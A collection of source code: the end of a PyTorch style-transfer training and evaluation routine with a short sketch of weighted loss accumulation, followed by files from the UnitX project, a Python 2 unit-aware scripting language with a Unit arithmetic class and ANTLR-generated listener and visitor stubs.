soft_out_cls_loss = sorted_soft_out_cls_loss.mean()
out_cls_loss = sorted_out_cls_loss.mean()
ca_loss = sorted_ca_loss.mean()
loss = rec_loss + bt_w * bt_loss\
+ cls_w * soft_out_cls_loss + ca_w * ca_loss
loss /= normalizer
loss.backward()
if (step+1) % grad_accum_interval == 0 or\
(grad_accum_interval >= num_iters_per_epoch and
(step+1) == num_iters_per_epoch):
g = clip_grad_norm(model.parameters(), args.max_grad_norm)
optimizer.step()
scheduler.step()
model.zero_grad()
loss_record.append(log_loss)
# global_step += 1
log_loss = 0.0
if global_step > 0 and global_step % args.log_interval == 0:
print(
f"epoch: {ep} "\
f"step: {global_step} "\
f"loss: {loss.item() * normalizer:.4f} "\
f"rec_loss: {rec_loss.item():.4f} "\
f"bt_loss: {bt_loss.item():.4f} "\
f"src_cls_loss: {src_cls_loss.item():.4f} "\
f"soft_out_cls_loss: {soft_out_cls_loss.item():.4f} "\
f"out_cls_loss: {out_cls_loss.item():.4f} "\
f"ca_loss: {ca_loss.item():.4f} "\
f"||g||: {g:.2f} "\
f"ca_w: {ca_w:.4f} "\
f"time: {misc.timeBetween(start_time, time.time())}"
)
if global_step > 0 and global_step % args.eval_interval == 0:
print("\neval model at step: %d" % global_step)
checkpoint_output_dir = os.path.join(args.output_dir, "checkpoint-%d" % global_step)
if not os.path.exists(checkpoint_output_dir):
os.mkdir(checkpoint_output_dir)
org_output_dir = args.output_dir
args.output_dir = checkpoint_output_dir
print("dev")
dev_metric = self.evaluate()
dev_metric_record.append(dev_metric)
global_step_record_for_eval.append(global_step)
args.output_dir = org_output_dir
print("Save checkpoint at %s" % checkpoint_output_dir)
self.save_checkpoint(checkpoint_output_dir)
model.train()
global_step += 1
if self.use_caw_schedule:
ca_w = ca_w_list[global_step]
else:
log_loss += loss.item()
except RuntimeError as e:
if 'out of memory' in str(e):
print('|| WARNING: ran out of memory ||\n')
if hasattr(torch.cuda, 'empty_cache'):
torch.cuda.empty_cache()
else:
print('|| WARNING: fail to train ||\n')
raise e
raise e
# gpu_profile(frame=sys._getframe(), event='line', arg=None)
print("### TRAINING ENDS ###\n")
print("\neval model at step: %d" % global_step)
checkpoint_output_dir = os.path.join(args.output_dir, "checkpoint-%d" % global_step)
if not os.path.exists(checkpoint_output_dir):
os.mkdir(checkpoint_output_dir)
org_output_dir = args.output_dir
args.output_dir = checkpoint_output_dir
print("dev")
dev_metric = self.evaluate()
dev_metric_record.append(dev_metric)
global_step_record_for_eval.append(global_step)
args.output_dir = org_output_dir
print("Save checkpoint at %s" % checkpoint_output_dir)
self.save_checkpoint(checkpoint_output_dir)
train_record = loss_record
eval_record = (dev_metric_record, global_step_record_for_eval)
with open(os.path.join(args.output_dir, "record.pt"), "wb") as f:
pickle.dump({"train": train_record, "eval": eval_record}, f)
self.save_train_result(train_record, eval_record)
return train_record, eval_record
def evaluate(self, eval_dataloader=None, data_path_list=None, ref_path_list=None, data_name="dev"):
eval_dataloader = eval_dataloader if eval_dataloader else self.dev_dataloader
ref_path_list = ref_path_list if ref_path_list else self.dev_ref_path_list
data_path_list = data_path_list if data_path_list else self.dev_data_path_list
args = self.args
model = self.model
tokenizer = self.tokenizer
clf_model = self.clf_model
model.eval()
num_data = 0
total_loss = 0
total_rec_loss = 0
total_bt_loss = 0
total_src_cls_loss = 0
total_soft_out_cls_loss = 0
total_out_cls_loss = 0
total_ca_loss = 0
outputs_list = []
outputs_len_list = []
lab_list = []
clf_preds_list = []
cls_w = args.cls_weight
ca_w = args.ca_weight
bt_w = args.bt_weight
pad_id = args.pad_id
start_time = time.time()
with torch.no_grad():
for step, batch in enumerate(eval_dataloader):
src, lab, src_len = batch
num_data += src.shape[0]
# print(f"ep:{ep}, step: {step}, src.shape[1] is", src.shape[1])
sorted_src_len, indices = torch.sort(src_len, dim=0, descending=True)
_, resorted_indices = torch.sort(indices, dim=0)
sorted_src = torch.index_select(src, dim=0, index=indices)
sorted_lab = torch.index_select(lab, dim=0, index=indices)
sorted_src = sorted_src.to(args.device)
sorted_src_len = sorted_src_len.to(args.device)
sorted_lab = sorted_lab.to(args.device)
resorted_indices = resorted_indices.to(args.device)
try:
sorted_src_pad_mask = sorted_src==pad_id
sorted_loss_tuple, sorted_outputs_tuple,\
sorted_algin = model(sorted_src, sorted_src_len,
sorted_lab, sorted_src_pad_mask)
sorted_rec_loss, sorted_bt_loss,\
sorted_src_cls_loss, sorted_soft_out_cls_loss,\
sorted_out_cls_loss, sorted_ca_loss = sorted_loss_tuple
sorted_outputs, sorted_outputs_len = sorted_outputs_tuple
# shape of sorted_outputs is [batch_size, max_len]
outputs = torch.index_select(sorted_outputs, dim=0, index=resorted_indices)
outputs_len = torch.index_select(sorted_outputs_len, dim=0, index=resorted_indices)
clf_preds = torch.argmax(clf_model(outputs), dim=-1)
rec_loss = sorted_rec_loss.sum()
bt_loss = sorted_bt_loss.sum()
src_cls_loss = sorted_src_cls_loss.sum()
soft_out_cls_loss = sorted_soft_out_cls_loss.sum()
out_cls_loss = sorted_out_cls_loss.sum()
ca_loss = sorted_ca_loss.sum()
loss = rec_loss + bt_w * bt_loss\
+ cls_w * soft_out_cls_loss + ca_w * ca_loss
total_rec_loss += rec_loss.item()
total_bt_loss += bt_loss.item()
total_src_cls_loss += src_cls_loss.item()
total_soft_out_cls_loss += soft_out_cls_loss.item()
total_out_cls_loss += out_cls_loss.item()
total_ca_loss += ca_loss.item()
total_loss += loss.item()
outputs_list.extend(
[x.squeeze(0) for x in torch.split(outputs, split_size_or_sections=1, dim=0)]
)
outputs_len_list.extend(
[x.squeeze(0) for x in torch.split(outputs_len, split_size_or_sections=1, dim=0)]
)
lab_list.extend(
[x.squeeze(0) for x in torch.split(lab, split_size_or_sections=1, dim=0)]
)
clf_preds_list.extend(
[x.squeeze(0).item() for x in torch.split(clf_preds, split_size_or_sections=1, dim=0)]
)
except RuntimeError as e:
if 'out of memory' in str(e):
print('|| WARNING: ran out of memory ||\n')
if hasattr(torch.cuda, 'empty_cache'):
torch.cuda.empty_cache()
else:
print('|| WARNING: fail to train ||\n')
raise e
eval_loss = total_loss / num_data
eval_rec_loss = total_rec_loss / num_data
eval_bt_loss = total_bt_loss / num_data
eval_src_cls_loss = total_src_cls_loss / num_data
eval_soft_out_cls_loss = total_soft_out_cls_loss / num_data
eval_out_cls_loss = total_out_cls_loss / num_data
eval_ca_loss = total_ca_loss / num_data
inv_lab_list = 1-np.array(lab_list)
# print("clf_preds_list is")
# print(clf_preds_list)
eval_acc = accuracy_score(inv_lab_list, np.array(clf_preds_list)) * 100.0
transfer_file_names = [
os.path.join(args.output_dir, f"{data_name}.0.tsf"),
os.path.join(args.output_dir, f"{data_name}.1.tsf")
]
transfer_files = [
open(transfer_file_names[0], 'w'),
open(transfer_file_names[1], 'w')
]
count = 0
# print(f"len(outputs_list): {len(outputs_list)}, len(outputs_len_list): {len(outputs_len_list)}")
for output, output_len, l in zip(outputs_list, outputs_len_list, lab_list):
# print("output is", output)
text = tokenizer.decode(output, include_sos_eos=False)
if output_len < args.max_decoding_len:
pass
if args.use_bpe:
text = text.replace("@@ ", "")
text = text.strip("@@")
transfer_files[l].write(text+'\n')
count += 1
transfer_files[0].close()
transfer_files[1].close()
try:
assert count == num_data
except:
print(f"count: {count}, total_num: {num_data}")
raise RuntimeError()
bleu_evaluator = BLEUEvaluator()
if ref_path_list is not None:
bleu_score_021 = bleu_evaluator.score(ref_path_list[0], transfer_file_names[0])
bleu_score_120 = bleu_evaluator.score(ref_path_list[1], transfer_file_names[1])
bleu_score = (bleu_score_021 + bleu_score_120) / 2
else:
bleu_score = None
if data_path_list is not None:
self_bleu_score_021 = bleu_evaluator.score(data_path_list[0], transfer_file_names[0])
self_bleu_score_120 = bleu_evaluator.score(data_path_list[1], transfer_file_names[1])
self_bleu_score = (self_bleu_score_021 + self_bleu_score_120) / 2
else:
self_bleu_score = None
print("==============================")
if ref_path_list is not None:
print(
f"BLEU: {bleu_score:.4f} "\
f"(0->1:{bleu_score_021:.4f}, 1->0:{bleu_score_120:.4f}) ",
end='',
)
if data_path_list is not None:
print(
f"self-BLEU: {self_bleu_score:.4f} "\
f"(0->1:{self_bleu_score_021:.4f}, 1->0:{self_bleu_score_120:.4f}) ",
end='',
)
print(
f"acc: {eval_acc:.4f}\n"\
f"loss: {eval_loss:.4f} "\
f"rec_loss: {eval_rec_loss:.4f} "\
f"bt_loss: {eval_bt_loss:.4f} "\
f"src_cls_loss: {eval_src_cls_loss:.4f} "\
f"soft_out_cls_loss: {eval_soft_out_cls_loss:.4f} "\
f"out_cls_loss: {eval_out_cls_loss:.4f} "\
f"ca_loss: {eval_ca_loss:.4f} "\
f"time: {misc.timeBetween(start_time, time.time())}"
)
print("==============================\n")
return (bleu_score, self_bleu_score, eval_acc)
def test(self, test_dataloader=None, data_path_list=None, ref_path_list=None):
test_dataloader = test_dataloader if test_dataloader else self.test_dataloader
ref_path_list = ref_path_list if ref_path_list else self.test_ref_path_list
data_path_list = data_path_list if data_path_list else self.test_data_path_list
return self.evaluate(test_dataloader, data_path_list, ref_path_list, "test")
def save_train_result(self, train_record, eval_record):
args = self.args
train_loss_record = train_record
dev_metric_record, eval_gs_record = eval_record
dev_unzip = list(zip(*dev_metric_record))
dev_bleu_record, dev_self_bleu_record, dev_acc_record = np.array(dev_unzip[0]),\
np.array(dev_unzip[1]), np.array(dev_unzip[2])
if (dev_bleu_record!=None).all():
best_dev_bleu = np.max(dev_bleu_record)
step_of_best_dev_bleu = eval_gs_record[np.argmax(dev_bleu_record)]
print("best dev BLEU: %.4f in step %d" % (best_dev_bleu, step_of_best_dev_bleu))
fig = plt.figure()
ax_1 = fig.add_subplot(111)
ax_2 = ax_1.twinx()
ax_1.set_xlabel("step")
ax_1.set_ylabel("(self-)BLEU")
ax_2.set_ylabel("Acc")
line_list = []
line_label_list = []
if (dev_bleu_record!=None).all():
# l, = ax_1.plot(eval_gs_record, dev_bleu_record, '-', c='#1f77b4', label="dev BLEU")
l, = ax_1.plot(eval_gs_record, dev_bleu_record, '-', c='#1f77b4')
line_list.append(l)
line_label_list.append("dev BLEU")
# l, = ax_1.plot(eval_gs_record, dev_self_bleu_record, ':', c='#1f77b4', label="dev self-BLEU")
l, = ax_1.plot(eval_gs_record, dev_self_bleu_record, ':', c='#1f77b4')
line_list.append(l)
line_label_list.append("dev self-BLEU")
# l, = ax_2.plot(eval_gs_record, dev_acc_record, '--', c='#1f77b4', label="dev acc")
l, = ax_2.plot(eval_gs_record, dev_acc_record, '--', c='#1f77b4')
line_list.append(l)
line_label_list.append("dev acc")
plt.legend(line_list, line_label_list)
plt.tight_layout()
plt.savefig(os.path.join(args.output_dir, "bleu_and_acc.pdf"), format='pdf') # bbox_inches='tight'
plt.close()
plt.figure()
plt.xlabel("step")
plt.ylabel("loss")
plt.plot(list(range(len(train_loss_record))), train_loss_record)
# plt.plot(eval_gs_record, eval_loss_record)
plt.tight_layout()
plt.savefig(os.path.join(args.output_dir, "loss.pdf"), format='pdf')
plt.close()
``` |
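The training loop above combines four loss terms with fixed (or scheduled) weights and scales the summed loss before backpropagation so gradients accumulate over several mini-batches. Below is a stripped-down sketch of that pattern with a dummy model; the weights, shapes, and loss stand-ins are illustrative only, and the normalizer is simplified to the accumulation interval.

```python
import torch

model = torch.nn.Linear(4, 2)
optimizer = torch.optim.Adam(model.parameters(), lr=1e-3)
grad_accum_interval = 4
cls_w, ca_w, bt_w = 0.05, 0.0, 1.0  # illustrative weights

model.zero_grad()
for step in range(8):
    out = model(torch.randn(3, 4))
    # Stand-ins for rec_loss, bt_loss, soft_out_cls_loss and ca_loss.
    rec_loss = out.pow(2).mean()
    bt_loss = out.abs().mean()
    soft_out_cls_loss = out.mean().abs()
    ca_loss = torch.tensor(0.0)
    loss = rec_loss + bt_w * bt_loss + cls_w * soft_out_cls_loss + ca_w * ca_loss
    (loss / grad_accum_interval).backward()  # scale so accumulated grads average out
    if (step + 1) % grad_accum_interval == 0:
        torch.nn.utils.clip_grad_norm_(model.parameters(), max_norm=1.0)
        optimizer.step()
        model.zero_grad()
```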
{
"source": "0ED/UnitX",
"score": 3
} |
#### File: UnitX/src/intro_line.py
```python
def get_line():
"""Gets a string of logo for intaractive run.
Returns:
        A string of the logo.
Advice:
        Use these commands to generate the logo.
$ figlet -kw 120 -f slant UnitX
$ jp2a -i --width=30 --chars=" XY" --output=sample.txt unit_logo.jpg
"""
import time
now_time = time.ctime(time.time())
ascii_art = """\
__ __ _ __ _ __
/ / / /____ (_)/ /_| |/ /
/ / / // __ \ / // __/| /
/ /_/ // / / // // /_ / |
\____//_/ /_//_/ \__//_/|_|
"""
unitx_info = """\
UnitX 0.7.0 (%s)""" % (now_time)
#Type "help" or "demo <number(0-2)>" for UnitX life.
console_info = ascii_art + unitx_info
return console_info
if __name__ == '__main__':
print get_line()
"""LOGO memo
______
____ / \_
/ \——-| \
/ \
| |
|_ \
|________ /
____| /
/ /\__/
/ __ |
| / \_ \__________
| | \ |
|____| |____________|
__ __ _ __ _ __
/ / / /____ (_)/ /_| |/ /
/ / / // __ \ / // __/| /
/ /_/ // / / // // /_ / |
\____//_/ /_//_/ \__//_/|_|
"""
```
#### File: UnitX/unitx/simulator.py
```python
import sys
import os
from unitx_object import UnitXObject
from unit_manager import UnitManager
from scope_list import ScopeList
from constants import Constants
class Simulator(object):
"""A class simulating a scope and a manager.
Attributes:
__scopes: An instance indicating a ScopeList class (a list structure).
__manager: An instance indicating a UnitManager class.
"""
def __init__(self):
"""Inits and sets a unit manager and a scope list."""
this_dir, _ = os.path.split(__file__)
data_path = os.path.join(this_dir, Constants.SYSTEM_UNIT_DATA)
self.__manager = UnitManager(data_path)
self.__scopes = ScopeList()
def get_scopes(self):
"""Returns scopes for saving variables.
Returns:
An instance indicating a ScopeList class (a list structure).
"""
return self.__scopes
def get_manager(self):
"""Returns a unit manager.
Returns:
An instance indicating a UnitManager class.
"""
return self.__manager
def main():
"""Run an example for a Unit class."""
from simulator import Simulator
s = Simulator()
print s.get_scopes()
s.get_scopes().del_scope()
print s.get_scopes()
if __name__ == '__main__':
sys.exit(main())
```
#### File: UnitX/unitx/unit.py
```python
import sys
from collegue import Collegue
from constants import Constants
class Unit(Collegue):
"""A class which has an infomation of a unit.
And this class can calculate between units by a function
which this class has.
Attributes:
        ex_numer: A string indicating the numerator of a unit which was used in the past.
        numer: A string indicating the current numerator.
        ex_denom: A string indicating the denominator of a unit which was used in the past.
        denom: A string indicating the current denominator.
token: An instance of Token class indicating the head of a unit statement.
Examples:
{MB}, {kg->g}, {m/s}, {km->m}, {km->m/s->h}
A data structure: { <ex_numer> -> <numer> / <ex_denom> -> <denom> }
"""
def __init__(self, ex_numer=None, numer=None, ex_denom=None, denom=None, token=None):
"""Inits attributes of a Unit class."""
self.token = token
self.ex_numer = ex_numer
self.numer = numer
self.ex_denom = ex_denom
self.denom = denom
def replace_tokens(self):
"""Replaces unit tokens to new unit tokens by finding in scopes."""
tokens = [self.ex_numer, self.numer, self.ex_denom, self.denom]
new_tokens = []
for t in tokens:
found_scope = self.mediator.get_scopes().peek().find_scope_of(t)
if found_scope:
unitx_obj = found_scope[t]
new_tokens.append(unitx_obj.get_value())
else:
new_tokens.append(t)
self.ex_numer, self.numer, self.ex_denom, self.denom = new_tokens
return
def remove_ex(self):
"""Removes varibles of ex_numer and ex_denom which don't need
for displaying on CLI.
"""
self.ex_numer = self.ex_denom = None
return
def is_empty(self):
"""Returns whether attributes of Unit are an empty.
Returns:
A bool indicating whether attributes of Unit are an empty.
"""
return self.ex_numer == self.numer == self.ex_denom == self.denom == None
def __notifyEasily(self, unit, opp_token):
"""Notify an error(notifyErrorListeners) easily.
Args:
self: An instance indicating a Unit class which probably has an error.
unit: An instance indicating a Unit class which probably has an error.
opp_token: An instance indicating a Token class reporting an error
on the listener(EvalErrorListener).
Raises:
TypeError: An error occurred by a difference of a unit type.
"""
msg = Constants.TYPE_ERR_UNSUPPORTED_UNIT % (opp_token.text, self.formal_str(), unit.formal_str())
self.mediator.get_parser().notifyErrorListeners(msg, opp_token, Exception(msg))
return
def add(self, unit, opp_token):
"""Returns a unit added self and unit.
Args:
self: An instance indicating a Unit class.
unit: An instance indicating a Unit class.
opp_token: An instance indicating a Token class reporting an error
on the listener(EvalErrorListener).
Examples:
<self> + <unit> -> <result>
{km} + {} -> {km}
{km} + {km} -> {km}
{km/s} + {km/s} -> {km/s}
"""
if self.numer == unit.numer and self.denom == unit.denom: return self
elif self.is_empty(): return unit
elif unit.is_empty(): return self
else:
self.__notifyEasily(unit, opp_token)
return
def subtract(self, unit, opp_token):
"""Returns a unit subtracted self and unit.
Args:
self: An instance indicating a Unit class.
unit: An instance indicating a Unit class.
opp_token: An instance indicating a Token class reporting an error
on the listener(EvalErrorListener).
Examples:
<self> - <unit> -> <result>
{km} - {} -> {km}
{km} - {km} -> {km}
{km/s} - {km/s} -> {km/s}
"""
return self.add(unit, opp_token)
def multiply(self, unit, opp_token):
"""Returns a unit multiplied self and unit.
Args:
self: An instance indicating a Unit class.
unit: An instance indicating a Unit class.
opp_token: An instance indicating a Token class reporting an error
on the listener(EvalErrorListener).
Examples:
<self> * <unit> -> <result>
{km} * {} -> {km}
{km/s} * {s} -> {km}
"""
if self.numer == unit.denom: return Unit(numer=unit.numer)
elif self.denom == unit.numer: return Unit(numer=self.numer)
elif self.is_empty(): return unit
elif unit.is_empty(): return self
else:
self.__notifyEasily(unit, opp_token)
return
def divide(self, unit, opp_token):
"""Returns a unit divided self and unit.
Args:
self: An instance indicating a Unit class.
unit: An instance indicating a Unit class.
opp_token: An instance indicating a Token class reporting an error
on the listener(EvalErrorListener).
Examples:
<self> / <unit> -> <result>
{km} / {km} -> {}
{km} / {s} -> {km/s}
{km} / {km/s} -> {s}
"""
if self.numer == unit.numer and self.denom == unit.denom: return Unit()
elif (not self.denom) and self.numer == unit.numer: return Unit(numer=unit.denom)
elif self.is_empty(): return unit
elif unit.is_empty(): return self
else:
self.__notifyEasily(unit, opp_token)
return
def modulo(self, unit, opp_token):
"""Returns a unit calculated a modulo of self and unit.
Args:
self: An instance indicating a Unit class.
unit: An instance indicating a Unit class.
opp_token: An instance indicating a Token class reporting an error
on the listener(EvalErrorListener).
Examples:
<self> % <unit> -> <result>
{km} % {km} -> {}
{km} % {s} -> {km/s}
{km} % {km/s} -> {s}
"""
return self.divide(unit, opp_token)
def equals(self, unit):
"""Returns whether self unit equals a unit of arguments.
Returns:
A bool indicating whether self unit equals a unit of arguments.
"""
return self.numer == unit.numer and self.denom == unit.denom
def formal_str(self):
"""Returns a formal string displaying on CLI.
Returns:
A string displaying on CLI.
"""
if self.numer and self.denom:
return '{%s/%s}' % (self.numer, self.denom)
elif self.numer and not self.denom:
return '{%s}' % (self.numer)
else:
return ''
def __unicode__(self):
"""Returns a string of attributes.
Returns:
            res: A string of attribute information.
"""
res = "<%s: {%s->%s/%s->%s}>" % (self.__class__.__name__, self.ex_numer, self.numer, self.ex_denom, self.denom)
return res
def __str__(self):
"""Returns an encoded string of attributes.
Returns:
An encoded string of attributes.
"""
return unicode(self).encode('utf-8')
def __repr__(self):
"""Returns a string of attributes.
Returns:
A string of a result of a __str__() function.
"""
return self.__str__()
@classmethod
def set_mediator(self, mediator):
"""Sets a mediator for Mediator pattern of GoF.
Args:
mediator: An instance of a EvalVisitor class inherited Mediator class.
"""
self.mediator = mediator
return
def main():
"""Run an example for a Unit class."""
#
# Checks printing a Unit object.
#
print Unit(u'分', u'時', None, None)
print Unit(u'm', u'km', None, u'時')
#
# add() demo
#
print '-' * 10
opp_token = None
left, right = Unit(None, u'km', None, u'時'), Unit(None, u'km', None, u'時')
print "%s + %s -> %s" % (left.formal_str(), right.formal_str(), left.add(right, opp_token).formal_str())
#
# subtract() demo
#
print '-' * 10
left, right = Unit(None, u'km', None, u'時'), Unit(None, u'km', None, u'時')
print "%s - %s -> %s" % (left.formal_str(), right.formal_str(), left.subtract(right, opp_token).formal_str())
#
# multiply() demo
#
print '-' * 10
left, right = Unit(None, u'km', None, u'時'), Unit(None, u'時', None, None)
print "%s * %s -> %s" % (left.formal_str(), right.formal_str(), left.multiply(right, opp_token).formal_str())
left, right = Unit(None, u'km', None, None), Unit(None, None, None, None)
print "%s * %s -> %s" % (left.formal_str(), right.formal_str(), left.multiply(right, opp_token).formal_str())
left, right = Unit(None, None, None, None), Unit(None, u'km', None, u'時')
print "%s * %s -> %s" % (left.formal_str(), right.formal_str(), left.multiply(right, opp_token).formal_str())
#left, right = Unit(None, u'km', None, u'時'), Unit(None, u'km', None, u'時')
#print "%s * %s -> %s" % (left.formal_str(), right.formal_str(), left.multiply(right, opp_token)) #error
#
# divide() demo
#
print '-' * 10
left, right = Unit(None, u'km', None, None), Unit(None, u'km', None, u'時')
print "%s / %s -> %s" % (left.formal_str(), right.formal_str(), left.divide(right, opp_token).formal_str())
left, right = Unit(None, u'km', None, u'時'), Unit(None, u'km', None, u'時')
print "%s / %s -> %s" % (left.formal_str(), right.formal_str(), left.divide(right, opp_token).formal_str())
left, right = Unit(None, u'km', None, None), Unit(None, u'km', None, None)
print "%s / %s -> %s" % (left.formal_str(), right.formal_str(), left.divide(right, opp_token).formal_str())
left, right = Unit(None, u'km', None, None), Unit(None, None, None, None)
print "%s / %s -> %s" % (left.formal_str(), right.formal_str(), left.divide(right, opp_token).formal_str())
#left, right = Unit(None, u'km', None, u'時'), Unit(None, u'時', None, None)
#print "%s / %s -> %s" % (left.formal_str(), right.formal_str(), left.divide(right, opp_token)) #error
return Constants.EXIT_SUCCESS
if __name__ == '__main__':
sys.exit(main())
```
#### File: UnitX/unitx/UnitXListener.py
```python
from antlr4 import *
# This class defines a complete listener for a parse tree produced by UnitXParser.
class UnitXListener(ParseTreeListener):
# Enter a parse tree produced by UnitXParser#program.
def enterProgram(self, ctx):
pass
# Exit a parse tree produced by UnitXParser#program.
def exitProgram(self, ctx):
pass
# Enter a parse tree produced by UnitXParser#typeDeclaration.
def enterTypeDeclaration(self, ctx):
pass
# Exit a parse tree produced by UnitXParser#typeDeclaration.
def exitTypeDeclaration(self, ctx):
pass
# Enter a parse tree produced by UnitXParser#functionDeclaration.
def enterFunctionDeclaration(self, ctx):
pass
# Exit a parse tree produced by UnitXParser#functionDeclaration.
def exitFunctionDeclaration(self, ctx):
pass
# Enter a parse tree produced by UnitXParser#formalParameters.
def enterFormalParameters(self, ctx):
pass
# Exit a parse tree produced by UnitXParser#formalParameters.
def exitFormalParameters(self, ctx):
pass
# Enter a parse tree produced by UnitXParser#formalParameterList.
def enterFormalParameterList(self, ctx):
pass
# Exit a parse tree produced by UnitXParser#formalParameterList.
def exitFormalParameterList(self, ctx):
pass
# Enter a parse tree produced by UnitXParser#formalParameter.
def enterFormalParameter(self, ctx):
pass
# Exit a parse tree produced by UnitXParser#formalParameter.
def exitFormalParameter(self, ctx):
pass
# Enter a parse tree produced by UnitXParser#block.
def enterBlock(self, ctx):
pass
# Exit a parse tree produced by UnitXParser#block.
def exitBlock(self, ctx):
pass
# Enter a parse tree produced by UnitXParser#blockStatement.
def enterBlockStatement(self, ctx):
pass
# Exit a parse tree produced by UnitXParser#blockStatement.
def exitBlockStatement(self, ctx):
pass
# Enter a parse tree produced by UnitXParser#statement.
def enterStatement(self, ctx):
pass
# Exit a parse tree produced by UnitXParser#statement.
def exitStatement(self, ctx):
pass
# Enter a parse tree produced by UnitXParser#repStatement.
def enterRepStatement(self, ctx):
pass
# Exit a parse tree produced by UnitXParser#repStatement.
def exitRepStatement(self, ctx):
pass
# Enter a parse tree produced by UnitXParser#ifStatement.
def enterIfStatement(self, ctx):
pass
# Exit a parse tree produced by UnitXParser#ifStatement.
def exitIfStatement(self, ctx):
pass
# Enter a parse tree produced by UnitXParser#expressionStatement.
def enterExpressionStatement(self, ctx):
pass
# Exit a parse tree produced by UnitXParser#expressionStatement.
def exitExpressionStatement(self, ctx):
pass
# Enter a parse tree produced by UnitXParser#printStatement.
def enterPrintStatement(self, ctx):
pass
# Exit a parse tree produced by UnitXParser#printStatement.
def exitPrintStatement(self, ctx):
pass
# Enter a parse tree produced by UnitXParser#assertStatement.
def enterAssertStatement(self, ctx):
pass
# Exit a parse tree produced by UnitXParser#assertStatement.
def exitAssertStatement(self, ctx):
pass
# Enter a parse tree produced by UnitXParser#dumpStatement.
def enterDumpStatement(self, ctx):
pass
# Exit a parse tree produced by UnitXParser#dumpStatement.
def exitDumpStatement(self, ctx):
pass
# Enter a parse tree produced by UnitXParser#borderStatement.
def enterBorderStatement(self, ctx):
pass
# Exit a parse tree produced by UnitXParser#borderStatement.
def exitBorderStatement(self, ctx):
pass
# Enter a parse tree produced by UnitXParser#expressionList.
def enterExpressionList(self, ctx):
pass
# Exit a parse tree produced by UnitXParser#expressionList.
def exitExpressionList(self, ctx):
pass
# Enter a parse tree produced by UnitXParser#parExpression.
def enterParExpression(self, ctx):
pass
# Exit a parse tree produced by UnitXParser#parExpression.
def exitParExpression(self, ctx):
pass
# Enter a parse tree produced by UnitXParser#repControl.
def enterRepControl(self, ctx):
pass
# Exit a parse tree produced by UnitXParser#repControl.
def exitRepControl(self, ctx):
pass
# Enter a parse tree produced by UnitXParser#endRep.
def enterEndRep(self, ctx):
pass
# Exit a parse tree produced by UnitXParser#endRep.
def exitEndRep(self, ctx):
pass
# Enter a parse tree produced by UnitXParser#expression.
def enterExpression(self, ctx):
pass
# Exit a parse tree produced by UnitXParser#expression.
def exitExpression(self, ctx):
pass
# Enter a parse tree produced by UnitXParser#unit.
def enterUnit(self, ctx):
pass
# Exit a parse tree produced by UnitXParser#unit.
def exitUnit(self, ctx):
pass
# Enter a parse tree produced by UnitXParser#unitSingleOrPairOperator.
def enterUnitSingleOrPairOperator(self, ctx):
pass
# Exit a parse tree produced by UnitXParser#unitSingleOrPairOperator.
def exitUnitSingleOrPairOperator(self, ctx):
pass
# Enter a parse tree produced by UnitXParser#unitOperator.
def enterUnitOperator(self, ctx):
pass
# Exit a parse tree produced by UnitXParser#unitOperator.
def exitUnitOperator(self, ctx):
pass
# Enter a parse tree produced by UnitXParser#primary.
def enterPrimary(self, ctx):
pass
# Exit a parse tree produced by UnitXParser#primary.
def exitPrimary(self, ctx):
pass
# Enter a parse tree produced by UnitXParser#literal.
def enterLiteral(self, ctx):
pass
# Exit a parse tree produced by UnitXParser#literal.
def exitLiteral(self, ctx):
pass
# Enter a parse tree produced by UnitXParser#string.
def enterString(self, ctx):
pass
# Exit a parse tree produced by UnitXParser#string.
def exitString(self, ctx):
pass
# Enter a parse tree produced by UnitXParser#halfString.
def enterHalfString(self, ctx):
pass
# Exit a parse tree produced by UnitXParser#halfString.
def exitHalfString(self, ctx):
pass
# Enter a parse tree produced by UnitXParser#number.
def enterNumber(self, ctx):
pass
# Exit a parse tree produced by UnitXParser#number.
def exitNumber(self, ctx):
pass
# Enter a parse tree produced by UnitXParser#integer.
def enterInteger(self, ctx):
pass
# Exit a parse tree produced by UnitXParser#integer.
def exitInteger(self, ctx):
pass
# Enter a parse tree produced by UnitXParser#boolean.
def enterBoolean(self, ctx):
pass
# Exit a parse tree produced by UnitXParser#boolean.
def exitBoolean(self, ctx):
pass
# Enter a parse tree produced by UnitXParser#none.
def enterNone(self, ctx):
pass
# Exit a parse tree produced by UnitXParser#none.
def exitNone(self, ctx):
pass
```
#### File: UnitX/unitx/UnitXVisitor.py
```python
from antlr4 import *
# This class defines a complete generic visitor for a parse tree produced by UnitXParser.
class UnitXVisitor(ParseTreeVisitor):
# Visit a parse tree produced by UnitXParser#program.
def visitProgram(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by UnitXParser#typeDeclaration.
def visitTypeDeclaration(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by UnitXParser#functionDeclaration.
def visitFunctionDeclaration(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by UnitXParser#formalParameters.
def visitFormalParameters(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by UnitXParser#formalParameterList.
def visitFormalParameterList(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by UnitXParser#formalParameter.
def visitFormalParameter(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by UnitXParser#block.
def visitBlock(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by UnitXParser#blockStatement.
def visitBlockStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by UnitXParser#statement.
def visitStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by UnitXParser#repStatement.
def visitRepStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by UnitXParser#ifStatement.
def visitIfStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by UnitXParser#expressionStatement.
def visitExpressionStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by UnitXParser#printStatement.
def visitPrintStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by UnitXParser#assertStatement.
def visitAssertStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by UnitXParser#dumpStatement.
def visitDumpStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by UnitXParser#borderStatement.
def visitBorderStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by UnitXParser#expressionList.
def visitExpressionList(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by UnitXParser#parExpression.
def visitParExpression(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by UnitXParser#repControl.
def visitRepControl(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by UnitXParser#endRep.
def visitEndRep(self, ctx):
